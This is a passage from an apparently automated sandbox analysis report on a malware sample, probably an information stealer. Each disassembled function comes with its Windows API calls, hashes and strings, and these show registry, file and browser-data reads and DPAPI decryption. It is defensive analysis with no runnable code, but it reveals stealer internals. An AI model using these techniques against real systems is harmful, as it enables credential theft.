                                                                            • API String ID: 3869837436-0
                                                                            • Opcode ID: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                            • Instruction ID: 909566f9f53506b5aa2d8709c9cb46b640c87a2d020782bf56f99dd61eaf9922
                                                                            • Opcode Fuzzy Hash: 64a3422522f7e7e46d77fb1e68ae032180970e1801099016b3dac20f8dd4ba7d
                                                                            • Instruction Fuzzy Hash: 6E218B70A00115ABDB20AFA4DC48EAFBBB9FF95710F20056EF952E62D4D7389911CB64
                                                                            Function 00410415 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42registryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • memset.MSVCRT ref: 0041043B
                                                                            • RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,004264F6,?,?,00000000), ref: 00410457
                                                                            • RegQueryValueExA.KERNEL32(004264F6,MachineGuid,00000000,00000000,?,000000FF,?,?,00000000), ref: 00410476
                                                                            • CharToOemA.USER32(?,?), ref: 00410493
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CharOpenQueryValuememset
                                                                            • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                                                            • API String ID: 1728412123-1211650757
                                                                            • Opcode ID: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                            • Instruction ID: 59bbf989d6e17c2dbf70e6b3d9441336261c3d0a51168b80e9bc1bfc74bcefc6
                                                                            • Opcode Fuzzy Hash: 690c6a79ccc41db0391f32f940e07a5d4ef8664030ade9d40bd6695f658342bb
                                                                            • Instruction Fuzzy Hash: BA014F7590421DFFEB10EB90DC8AFEABB7CEB14704F1000A5B244E2051EAB45EC88B60
                                                                            Function 0040FF81 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 38memoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetProcessHeap.KERNEL32(00000000,00000104,00000001,00000000,00000000,?,Windows: ,00000000,?,004265CC,00000000,?,Work Dir: In memory,00000000,?,004265B4), ref: 0040FF8F
                                                                            • HeapAlloc.KERNEL32(00000000), ref: 0040FF96
                                                                            • GlobalMemoryStatusEx.KERNEL32 ref: 0040FFB6
                                                                            • wsprintfA.USER32 ref: 0040FFDC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Heap$AllocGlobalMemoryProcessStatuswsprintf
                                                                            • String ID: %d MB$@
                                                                            • API String ID: 3644086013-3474575989
                                                                            • Opcode ID: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                            • Instruction ID: 4fd6b884c886e70f5bea54c710daa34e5fcd35151b99761237641847ab172de6
                                                                            • Opcode Fuzzy Hash: 4f991f30794ae567231d4426d27710baedccdaada08d1eb6089db446b3004ae7
                                                                            • Instruction Fuzzy Hash: A5F030B5A40218ABEB149BA4DC4AFBE76BEEB45705F400139F706E62C0DBB8D8058775
                                                                            Function 00415CA5 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00415CAA
                                                                            • memset.MSVCRT ref: 00415CD6
                                                                            • RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,?,?,?,00000000), ref: 00415CF3
                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,000000FF,?,?,00000000), ref: 00415D13
                                                                            • lstrcat.KERNEL32(?,?), ref: 00415D42
                                                                            • lstrcat.KERNEL32(?), ref: 00415D55
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcat$H_prologOpenQueryValuememset
                                                                            • String ID:
                                                                            • API String ID: 2333602472-0
                                                                            • Opcode ID: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                            • Instruction ID: b1237888a7669b0395c9cdb9a6d9471705cae356a33a5f6a680b3cc5b253afb1
                                                                            • Opcode Fuzzy Hash: 5908ee0a41c72f3eb61dbe54366e8acb213d08ed70dfc70b307fc866011581ad
                                                                            • Instruction Fuzzy Hash: 8F419DB1D4021DABCF10EFA0DC86EDD7B7DAF18344F00456AB618A2191E7399A858BD2
                                                                            Function 00417250 Relevance: 9.1, APIs: 6, Instructions: 65sleepCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32(kernel32.dll,00417262), ref: 00417335
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041737A
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417391
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173A8
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173BF
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173D6
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004173ED
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417404
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041741B
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417432
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417449
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417460
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417477
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041748E
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174A5
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174BC
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174D3
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 004174EA
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417501
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 00417518
                                                                              • Part of subcall function 00417330: GetProcAddress.KERNEL32 ref: 0041752F
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417540
                                                                              • Part of subcall function 00417330: LoadLibraryA.KERNEL32 ref: 00417551
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FBCB: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00417274,0042656F), ref: 0040FBD7
                                                                              • Part of subcall function 0040FBCB: HeapAlloc.KERNEL32(00000000,?,?,?,00417274,0042656F), ref: 0040FBDE
                                                                              • Part of subcall function 0040FBCB: GetUserNameA.ADVAPI32(00000000,?), ref: 0040FBF2
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • CloseHandle.KERNEL32(00000000), ref: 004172D5
                                                                            • Sleep.KERNEL32(00001B58), ref: 004172E0
                                                                            • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,?,00426AC0,?,00000000,0042656F), ref: 004172F1
                                                                            • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00417307
                                                                            • CloseHandle.KERNEL32(00000000), ref: 00417315
                                                                            • ExitProcess.KERNEL32 ref: 0041731C
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AddressProc$LibraryLoadlstrcpy$CloseEventHandleHeapProcess$AllocCreateExitH_prologNameOpenSleepUserlstrcatlstrlen
                                                                            • String ID:
                                                                            • API String ID: 1043047581-0
                                                                            • Opcode ID: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                            • Instruction ID: 5fe09bd252f0d150a6d3d00478baf6c0c38f56ac8277075a71d8cdb1780555ff
                                                                            • Opcode Fuzzy Hash: 63899c68169e41570f029a222e57a0ca82ee8ba73f8e0d272385d8930f0730d7
                                                                            • Instruction Fuzzy Hash: 45112C71900019BBCB11FBA2DD6ADEEB77DAE55304B50007EB502B24E1DF386A09CA69
                                                                            Function 00403A54 Relevance: 9.1, APIs: 6, Instructions: 56stringnetworkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 00403A59
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A8B
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A94
                                                                            • ??_U@YAPAXI@Z.MSVCRT ref: 00403A9D
                                                                            • lstrlenA.KERNEL32(00000000,00000000,?,?,00000001,000000C8), ref: 00403AB7
                                                                            • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 00403AC7
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CrackH_prologInternetlstrlen
                                                                            • String ID:
                                                                            • API String ID: 503950642-0
                                                                            • Opcode ID: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                            • Instruction ID: cc07c141d42f95622a17f2cc37de93049e7409e5d01b43fa4466afa553a2edca
                                                                            • Opcode Fuzzy Hash: 0d221dbbc7c0b090ec087e33715908742fb57a3485d1500de3dc28ba3d66cb29
                                                                            • Instruction Fuzzy Hash: B4114C71D00208ABCB24AFA5D805BDE7F78AF45325F20422AF921A62D0DB385A498B54
                                                                            Function 0040B1E0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 186stringCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040B1E5
                                                                              • Part of subcall function 0040F95A: lstrcpy.KERNEL32(00000000,okA), ref: 0040F980
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                            • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00425ED8,00425BE3), ref: 0040B2A6
                                                                            • lstrlenA.KERNEL32(00000000), ref: 0040B2C2
                                                                              • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                              • Part of subcall function 0040AFAF: _EH_prolog.MSVCRT ref: 0040AFB4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: H_prolog$lstrcpy$File$AllocLocallstrcatlstrlen$CloseCreateHandleReadSize
                                                                            • String ID: ^userContextId=4294967295$moz-extension+++
                                                                            • API String ID: 2813378046-3310892237
                                                                            • Opcode ID: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                            • Instruction ID: 4f6f4bd48829af219670311540be59081c9cea49b359b7f79f2b82a8f20ba16d
                                                                            • Opcode Fuzzy Hash: 0171a6eed1cad274af742993f372e6eb5dbe1f221bce049fb29b10c6c864d2db
                                                                            • Instruction Fuzzy Hash: F6715D70905248AACB14FBE5D516BDDBBB4AF19308F50417EE805736C2DB78670CCB66
                                                                            Function 004064E5 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 153libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 004064EA
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                              • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                              • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                              • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                              • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                              • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                              • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                              • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                            • GetEnvironmentVariableA.KERNEL32(C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,00000000,?,?,00425B44,?,?,?,00425B3F,?), ref: 004065A7
                                                                              • Part of subcall function 0040F997: lstrlenA.KERNEL32(?,00000000,?,004169B9,0042655F,0042655E,00000000,00000000,?,00417314), ref: 0040F9A0
                                                                              • Part of subcall function 0040F997: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F9D4
                                                                            • SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,00425B48,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,00425B43), ref: 0040661F
                                                                            • LoadLibraryA.KERNEL32(00000000), ref: 0040663A
                                                                            Strings
                                                                            • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 0040659B, 004065A0, 004065BA
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: lstrcpy$H_prolog$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                            • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                            • API String ID: 757424748-1193256905
                                                                            • Opcode ID: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                            • Instruction ID: b62f1dd5ee535d8e5f8645b721c07d1aad3572f7288e272c7e543ebc5a1b68b9
                                                                            • Opcode Fuzzy Hash: f6ce9d2092b8488091eba00a9cdcecb47d6563a634a2b248d5590a137b97323b
                                                                            • Instruction Fuzzy Hash: 7B617170801544EECB25EBA4EA15AEDBBB5EB28304F10507EE506736E2DB381A09CF65
                                                                            Function 0040C186 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _EH_prolog.MSVCRT ref: 0040C18B
                                                                              • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                              • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                              • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                              • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                              • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                              • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                              • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                              • Part of subcall function 00410D6D: LocalAlloc.KERNEL32(00000040,004131CC,000000C8,00000001,?,004131CB,00000000,00000000), ref: 00410D86
                                                                            • StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                              • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                              • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                              • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                              • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                            • memcmp.MSVCRT ref: 0040C21C
                                                                              • Part of subcall function 004062A5: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 004062C8
                                                                              • Part of subcall function 004062A5: LocalAlloc.KERNEL32(00000040,?,?), ref: 004062E0
                                                                              • Part of subcall function 004062A5: LocalFree.KERNEL32(?), ref: 004062FE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000002.00000002.2467141925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000002.00000002.2467141925.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                            • Associated: 00000002.00000002.2467141925.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
